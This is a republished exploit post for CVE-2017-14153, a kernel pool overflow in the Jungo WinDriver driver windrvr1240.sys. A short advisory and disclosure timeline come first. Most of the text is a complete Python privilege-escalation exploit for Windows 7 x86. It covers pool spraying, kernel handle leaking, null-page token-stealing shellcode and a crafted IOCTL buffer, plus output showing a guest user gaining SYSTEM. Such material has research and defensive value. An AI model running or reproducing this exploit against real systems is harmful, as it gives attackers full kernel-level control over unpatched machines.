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Jungo DriverWizard WinDriver - Kernel Pool Overflow
来源:http://srcincite.io 作者:mr_me 发布时间:2017-09-07  
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability
 
Download: http://www.jungo.com/st/products/windriver/
File:     WD1240.EXE
Sha1:     3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver:   windrvr1240.sys
Sha1:     0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE:      CVE-2017-14153
Author:   Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks:   b33f, ryujin and sickness
Analysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
 
Summary:
========
 
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
 
The specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
 
Timeline:
=========
 
2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 – No response from Jungo and two bounced emails
2017-08-26 – Attempted a follow up with the vendor via website chat
2017-08-26 – No response via the website chat
2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it"
2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 – No response from Jungo
2017-09-06 – Public 0day release of advisory
 
Example:
========
 
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       BUILTIN\Administrators:(I)(F)
       BUILTIN\Users:(I)(F)
       Mandatory Label\Low Mandatory Level:(I)(NW)
 
Successfully processed 1 files; Failed processing 0 files
 
C:\Users\Guest\Desktop>whoami
debugee\guest
 
C:\Users\Guest\Desktop>poc.py
 
        --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
                       Steven Seeley (mr_me) of Source Incite
 
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Users\Guest\Desktop>whoami
nt authority\system
 
C:\Users\Guest\Desktop>
"""
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time
from platform import release, architecture
 
ntdll    = windll.ntdll
kernel32 = windll.kernel32
MEM_COMMIT             = 0x00001000
MEM_RESERVE            = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS              = 0x0
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_INVALID_HANDLE       = 0xC0000008
SystemExtendedHandleInformation = 64
 
class LSA_UNICODE_STRING(Structure):
    """Represent the LSA_UNICODE_STRING on ntdll."""
    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", LPWSTR),
    ]
 
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
    """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
    _fields_ = [
        ("Object", c_void_p),
        ("UniqueProcessId", ULONG),
        ("HandleValue", ULONG),
        ("GrantedAccess", ULONG),
        ("CreatorBackTraceIndex", USHORT),
        ("ObjectTypeIndex", USHORT),
        ("HandleAttributes", ULONG),
        ("Reserved", ULONG),
    ]
 
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
    """Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
    _fields_ = [
        ("NumberOfHandles", ULONG),
        ("Reserved", ULONG),
        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
    ]
 
class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
    """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
    _fields_ = [
        ("Name", LSA_UNICODE_STRING),
        ("Reserved", ULONG * 22),
    ]
 
class PROCESSENTRY32(Structure):
    _fields_ = [
        ("dwSize", c_ulong),
        ("cntUsage", c_ulong),
        ("th32ProcessID", c_ulong),
        ("th32DefaultHeapID", c_int),
        ("th32ModuleID", c_ulong),
        ("cntThreads", c_ulong),
        ("th32ParentProcessID", c_ulong),
        ("pcPriClassBase", c_long),
        ("dwFlags", c_ulong),
        ("szExeFile", c_wchar * MAX_PATH)
    ]
 
Process32First = kernel32.Process32FirstW
Process32Next  = kernel32.Process32NextW
 
def signed_to_unsigned(signed):
    """
    Convert signed to unsigned integer.
    """
    unsigned, = struct.unpack ("L", struct.pack ("l", signed))
    return unsigned
                
def get_type_info(handle):
    """
    Get the handle type information to find our sprayed objects.
    """
    public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
    size = DWORD(sizeof(public_object_type_information))
    while True:
        result = signed_to_unsigned(
            ntdll.NtQueryObject(
                handle, 2, byref(public_object_type_information), size, None))
        if result == STATUS_SUCCESS:
            return public_object_type_information.Name.Buffer
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(public_object_type_information, size.value)
        elif result == STATUS_INVALID_HANDLE:
            return None
        else:
            raise x_file_handles("NtQueryObject.2", hex (result))
 
def get_handles():
    """
    Return all the processes handles in the system at the time.
    Can be done from LI (Low Integrity) level on Windows 7 x86.
    """
    system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
    size = DWORD (sizeof (system_handle_information))
    while True:
        result = ntdll.NtQuerySystemInformation(
            SystemExtendedHandleInformation,
            byref(system_handle_information),
            size,
            byref(size)
        )
        result = signed_to_unsigned(result)
        if result == STATUS_SUCCESS:
            break
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(system_handle_information, size.value)
        else:
            raise x_file_handles("NtQuerySystemInformation", hex(result))
 
    pHandles = cast(
        system_handle_information.Handles,
        POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
                system_handle_information.NumberOfHandles)
    )
    for handle in pHandles.contents:
        yield handle.UniqueProcessId, handle.HandleValue, handle.Object
 
def we_can_alloc_shellcode():
    """
    This function allocates the shellcode @ the null page making
    sure the new OkayToCloseProcedure pointer points to shellcode.
    """
    baseadd   = c_int(0x00000004)
    null_size = c_int(0x1000)
 
    tokenstealing = (
    "\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80"
    "\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04"
    "\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10"
    "\x00" )
    
    OkayToCloseProcedure = struct.pack("<L", 0x00000078)
    sc  = "\x42" * 0x70 + OkayToCloseProcedure
 
    # first we restore our smashed TypeIndex
    sc += "\x83\xC6\x0c"              # add esi, 0c
    sc += "\xc7\x06\x0a\x00\x08\x00"  # mov [esi], 8000a
    sc += "\x83\xee\x0c"              # sub esi, 0c
    sc += tokenstealing
    sc += "\x90" * (0x400-len(sc))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(null_size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) error while allocating the null paged memory: %s" % dwStatus
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))
    if write == 0:
        print "(-) error while writing our junk to the null paged memory: %s" % write
        return False
    return True
 
def we_can_spray():
    """
    Spray the Kernel Pool with IoCompletionReserve and Event Objects.
    The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
    These are allocated from the Nonpaged kernel pool.
    """
    handles = []
    IO_COMPLETION_OBJECT = 1
    for i in range(0, 25000):
        handles.append(windll.kernel32.CreateEventA(0,0,0,0))
        hHandle = HANDLE(0)
        handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))
 
    # could do with some better validation
    if len(handles) > 0:
        return True
    return False
 
def alloc_pool_overflow_buffer(base, input_size):
    """
    Craft our special buffer to trigger the overflow.
    """
    print "(+) allocating pool overflow input buffer"
    baseadd   = c_int(base)
    size = c_int(input_size)
    input  = "\x41" * 0x18                     # offset to size
    input += struct.pack("<I", 0x0000008d)     # controlled size (this triggers the overflow)
    input += "\x42" * (0x90-len(input))        # padding to survive bsod
    input += struct.pack("<I", 0x00000000)     # use a NULL dword for sub_4196CA
    input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer
    
    # repair the allocated chunk header...
    input += struct.pack("<I", 0x040c008c)     # _POOL_HEADER
    input += struct.pack("<I", 0xef436f49)     # _POOL_HEADER (PoolTag)
    input += struct.pack("<I", 0x00000000)     # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x0000005c)     # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000000)     # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000000)     # _OBJECT_HEADER_QUOTA_INFO
    input += struct.pack("<I", 0x00000001)     # _OBJECT_HEADER (PointerCount)
    input += struct.pack("<I", 0x00000001)     # _OBJECT_HEADER (HandleCount)
    input += struct.pack("<I", 0x00000000)     # _OBJECT_HEADER (Lock)
    input += struct.pack("<I", 0x00080000)     # _OBJECT_HEADER (TypeIndex)
    input += struct.pack("<I", 0x00000000)     # _OBJECT_HEADER (ObjectCreateInfo)
    
    # filler
    input += "\x44" * (input_size-len(input))
    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
                                              POINTER(c_int), c_int, c_int]
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
                                             byref(size),
                                             MEM_RESERVE|MEM_COMMIT,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        print "(-) error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
        return False
    written = c_ulong()
    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
    if write == 0:
        print "(-) error while writing our input buffer memory: %s" % write
        return False
    return True
 
def we_can_trigger_the_pool_overflow():
    """
    This triggers the pool overflow vulnerability using a buffer of size 0x460.
    """
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE_NAME   = "\\\\.\\WinDrvr1240"
    dwReturn      = c_ulong()
    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
    inputbuffer       = 0x41414141
    inputbuffer_size  = 0x5000
    outputbuffer_size = 0x5000
    outputbuffer      = 0x20000000
    alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
    IoStatusBlock = c_ulong()
 
    if driver_handle:
        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,
                                                inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
        return True
    return False
 
def we_can_make_pool_holes():
    """
    This makes the pool holes that will coalesce into a hole of size 0x460.
    """
    global khandlesd
    mypid = os.getpid()
    khandlesd = {}
    khandlesl = []
    
    # leak kernel handles
    for pid, handle, obj in get_handles():
 
        # mixed object attack
        if pid == mypid and (get_type_info(handle) == "Event" or get_type_info(handle) == "IoCompletionReserve"):
            khandlesd[obj] = handle
            khandlesl.append(obj)
 
    # Find holes and make our allocation
    holes = []
    for obj in khandlesl:
 
        # obj address is the handle address, but we want to allocation
        # address, so we just remove the size of the object header from it.
        alloc = obj - 0x30
 
        # Get allocations at beginning of the page
        if (alloc & 0xfffff000) == alloc:
            bin = []
 
            # object sizes
            CreateEvent_size         = 0x40
            IoCompletionReserve_size = 0x60
            combined_size            = CreateEvent_size + IoCompletionReserve_size
 
            # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object
            offset = IoCompletionReserve_size  
            for i in range(offset, offset + (7 * combined_size), combined_size):
                try:
                    # chunks need to be next to each other for the coalesce to take effect
                    bin.append(khandlesd[obj + i])
                    bin.append(khandlesd[obj + i - IoCompletionReserve_size])
                except KeyError:
                    pass
 
            # make sure it's contiguously allocated memory
            if len(tuple(bin)) == 14:
                holes.append(tuple(bin))
 
    # make the holes to fill
    for hole in holes:
        for handle in hole:
            kernel32.CloseHandle(handle)
    return True
 
def trigger_lpe():
    """
    This function frees the IoCompletionReserve objects and this triggers the
    registered aexit, which is our controlled pointer to OkayToCloseProcedure.
    """
    # free the corrupted chunk to trigger OkayToCloseProcedure
    for k, v in khandlesd.iteritems():
        kernel32.CloseHandle(v)
    os.system("cmd.exe")
 
def main():
    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]"
    print "\t               Steven Seeley (mr_me) of Source Incite\r\n"
 
    if release() != "7" or architecture()[0] != "32bit":
        print "(-) although this exploit may work on this system,"
        print "    it was only designed for Windows 7 x86."
        sys.exit(-1)
 
    print "(+) spraying pool with mixed objects..."
    if we_can_spray():
        print "(+) sprayed the pool!"
        print "(+) making pool holes..."
        if we_can_make_pool_holes():
            print "(+) made the pool holes!"
            print "(+) allocating shellcode..."
            if we_can_alloc_shellcode():
                print "(+) allocated the shellcode!"
                print "(+) triggering pool overflow..."
                if we_can_trigger_the_pool_overflow():
                    print "(+) elevating privileges!"
                    trigger_lpe()
 
if __name__ == '__main__':
    main()
 
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